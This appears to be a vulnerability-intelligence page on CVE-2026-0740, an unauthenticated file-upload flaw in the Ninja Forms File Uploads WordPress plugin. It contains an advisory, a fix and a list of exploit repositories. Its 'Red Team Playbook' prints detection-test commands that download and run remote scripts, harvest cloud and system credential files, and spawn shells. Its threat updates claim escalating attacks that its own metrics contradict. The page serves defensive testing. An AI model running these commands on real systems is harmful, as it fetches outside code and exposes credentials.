CVE-2026-0740

CRITICAL EXPLOIT POC TTE Zero-Day Pub 07/04 Upd 08/04

Overview

This vulnerability is an arbitrary file upload flaw caused by insufficient file type validation within the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function of the Ninja Forms - File Uploads WordPress plugin. The affected component responsible for handling AJAX file uploads fails to properly restrict allowed file extensions and MIME types, enabling unfiltered files to be accepted and stored on the server. This weakness exists in all plugin versions up to and including 3.3.26.

Vulnerability Description

The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.

Impact

An unauthenticated attacker can exploit this vulnerability to upload arbitrary files to the target server, potentially including web shells or other malicious payloads. This capability allows remote code execution under the web server's privileges, leading to full site compromise, data theft, or persistent backdoors. The vulnerability requires no user interaction or authentication (CVSS vector AV:N/AC:L/PR:N/UI:N), making exploitation straightforward for remote attackers with network access to the vulnerable WordPress installation.

Solution

To remediate this vulnerability, users must upgrade the Ninja Forms - File Uploads plugin to version 3.3.27 or later, where the file type validation is fully enforced. The partial fix in version 3.3.25 is insufficient and should not be considered secure. Detailed patch instructions and updates are available from the official Ninja Forms extension page (https://ninjaforms.com/extensions/file-uploads/) and the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12).

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the Ninja Forms - File Uploads plugin for WordPress arises from inadequate validation of file types during the upload process. Specifically, the flaw exists within the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function, which fails to properly restrict the types of files that can be uploaded. This oversight allows attackers to bypass security measures and upload arbitrary files to the server hosting the affected site. The implications of this vulnerability are severe, as it opens the door to potential remote code execution, enabling malicious actors to execute arbitrary code on the server, compromise the integrity of the web application, and potentially gain unauthorized access to sensitive data.

Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker could leverage the file upload feature of the plugin to submit malicious files, such as web shells or executable scripts, disguised as benign file types. Once uploaded, these files can be executed on the server, leading to a complete compromise of the web application and potentially the underlying server infrastructure. Attackers may also utilize social engineering tactics to trick users into uploading malicious files, further increasing the likelihood of successful exploitation. Given the widespread use of WordPress and its plugins, the attack surface is significant, making it a prime target for cybercriminals.

The real-world impact of this vulnerability can be profound, particularly for organizations that rely on WordPress for their online presence. Successful exploitation can lead to data breaches, loss of customer trust, and significant financial repercussions. Businesses may face regulatory penalties if sensitive data is compromised, and the costs associated with incident response, remediation, and potential legal actions can escalate quickly. Furthermore, the reputational damage incurred from a publicized breach can have long-lasting effects on customer relationships and brand loyalty. The high CVSS score of 9.8 underscores the critical nature of this vulnerability and the urgency for organizations to address it.

To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, updating the Ninja Forms - File Uploads plugin to the latest version is essential, as the vulnerability has been fully patched in version 3.3.27. Regularly monitoring and applying updates to all plugins and themes is a best practice for maintaining a secure WordPress environment. Additionally, employing web application firewalls (WAFs) can help filter out malicious traffic and block attempts to exploit known vulnerabilities. Implementing strict file type validation on the server-side, regardless of the plugin's capabilities, can further reduce the risk of arbitrary file uploads. Organizations should also conduct regular security audits and vulnerability assessments to identify and remediate potential weaknesses in their web applications.

In conclusion, the vulnerability within the Ninja Forms - File Uploads plugin poses a significant threat to the security of WordPress sites. The potential for arbitrary file uploads and subsequent remote code execution highlights the importance of robust file validation mechanisms and timely updates. By adopting proactive security measures, organizations can mitigate the risks associated with this vulnerability and protect their digital assets from malicious actors. The evolving threat landscape necessitates continuous vigilance and a commitment to cybersecurity best practices to safeguard against emerging vulnerabilities.




CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Ninja Forms - File Uploads plugin vulnerability (CVE-2026-0740). Our telemetry indicates the emergence of new proof-of-concept exploits publicly available on GitHub, which has broadened the attack surface and lowered the barrier for threat actors to weaponize this flaw. This development coincides with a significant uptick in detection activity, signaling that adversaries are actively integrating these exploits into their toolsets. The elevation of the CVSS score to 9.8 reflects the critical nature of this vulnerability, underscoring its potential for unauthenticated remote code execution on affected WordPress sites. Although the EPSS score remains relatively low, the doubling of its value suggests growing exploitation likelihood in the near term. For defenders, this shift necessitates heightened vigilance as the vulnerability transitions from theoretical risk to active exploitation, increasing the urgency for comprehensive monitoring and response capabilities. The evolving exploit landscape, coupled with the availability of public exploit code, amplifies the threat level and demands continuous reassessment of protective measures.



Update 2 — April 20, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-0740, evidenced by a discernible uptick in detection activity across our sensors. This increase coincides with the emergence of new proof-of-concept exploits publicly available on multiple platforms, broadening the toolkit accessible to threat actors. While the EPSS score remains low in absolute terms, its continued upward trajectory signals a growing likelihood of exploitation in operational environments. This evolution underscores a shift from opportunistic scanning toward more deliberate and potentially successful intrusion attempts. For defenders, the expanding exploit landscape and heightened activity necessitate increased situational awareness and prioritization of monitoring efforts, as the vulnerability’s exploitation risk is intensifying and may soon translate into more frequent and impactful incidents.



Update 3 — May 15, 2026

CSURFACE threat intelligence has identified a marked expansion in the exploit landscape for CVE-2026-0740, highlighted by the recent publication of a dedicated ExploitDB entry and the emergence of multiple new proof-of-concept exploits across public repositories. Despite a notable reduction in detection activity from our sensors, the exploitability prediction scoring system (EPSS) has surged dramatically, reflecting a rapidly growing probability of successful exploitation attempts in the near term. This divergence suggests that threat actors are refining their capabilities and shifting toward more targeted and effective attack methods, potentially leveraging the newly available exploit code. The current EPSS score places this vulnerability in the upper percentile for exploitation likelihood, signaling a heightened threat level that demands increased vigilance. For defenders, these developments indicate that while opportunistic scanning may have waned, the risk of sophisticated intrusion attempts exploiting this vulnerability is intensifying, elevating the overall risk posture associated with affected deployments.



Update 4 — July 14, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-0740, accompanied by the emergence of multiple new proof-of-concept exploit repositories. Our telemetry indicates that threat actors are increasingly leveraging these publicly available tools to conduct more sophisticated and automated attacks against vulnerable Ninja Forms - File Uploads plugin instances. This development signifies a shift from opportunistic scanning toward targeted exploitation campaigns, likely increasing the risk of successful remote code execution on affected WordPress sites. Although the EPSS score remains stable, the broadened exploit landscape and intensified activity elevate the overall threat level, underscoring the criticality of this vulnerability in current attack operations.



Update 5 — July 22, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Ninja Forms - File Uploads plugin, coinciding with the emergence of several new public proof-of-concept exploits hosted on popular code repositories. This proliferation of exploitation tools has lowered the technical barrier for threat actors, enabling a broader range of adversaries—including less sophisticated groups—to conduct automated arbitrary file upload attacks. Our telemetry indicates that these developments have catalyzed a shift from sporadic scanning to more persistent and targeted intrusion efforts. Although the EPSS score remains stable, the qualitative increase in exploitation activity and the expanded availability of weaponized code significantly elevate the operational threat level. Defenders should recognize that the growing ease of exploitation and the intensification of attack campaigns increase the likelihood of successful remote code execution incidents, thereby amplifying the potential impact on affected WordPress environments.

Affected Products

No CPE information available.

Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

ExploitDB (1)

Title Author Type Platform Date Link
Ninja Forms Uploads - Unauthenticated PHP File Upload selim.lanouar webapps multiple - View

GitHub PoCs (11)

Repository Author Stars Forks Date Link
0xgh057r3c0n/CVE-2026-0740
Ninja Forms File Uploads <= 3.3.26 - Unauthenticated Arbitrary File Upload
0xgh057r3c0n 23 5 2026-04-17 View
MadExploits/ninja-form-exploit
CVE-2026-0740
MadExploits 3 1 2026-07-14 View
whattheslime/CVE-2026-0740
Ninja Forms File Uploads <= 3.3.26 - Unauthenticated Arbitrary File Upload to RCE (CVE-2026-0740)
whattheslime 1 2 2026-04-07 View
xShadow-Here/CVE-2026-0740
POC
xShadow-Here 3 0 2026-04-08 View
ExDev994/CVE-2026-0740-mass
PoC untuk CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Unauthenticated Arbitrary File Upload yang dapat mengarah ...
ExDev994 1 1 2026-07-11 View
BastianXploited/CVE-2026-0740
BastianXploited 0 1 2026-05-09 View
murrez/CVE-2026-0740
CVE-2026-0740
murrez 1 0 2026-04-25 View
llaytynher/CVE-2026-0740-upload-template
llaytynher 0 0 2026-08-22 View
BastianXploited/CVE-2026-0740-mass
BastianXploited 0 0 2026-07-02 View
a24ac1/CVE-2026-0740
a24ac1 0 0 2026-05-20 View
zycoder0day/CVE-2026-0740
zycoder0day 0 0 2026-05-11 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

27 events
2026-08-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-16
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-08
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-04-07
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-04-07
PoC Published (11 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-04-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

Exploit Published (1 ExploitDB, 0 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

File Upload Vulnerabilities
100% file_upload
Remote Code Execution
87% rce

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs
35%
High High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (3)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-0740
wordfence.com
GitHub CVE
https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve
ninjaforms.com
GitHub CVE
https://ninjaforms.com/extensions/file-uploads/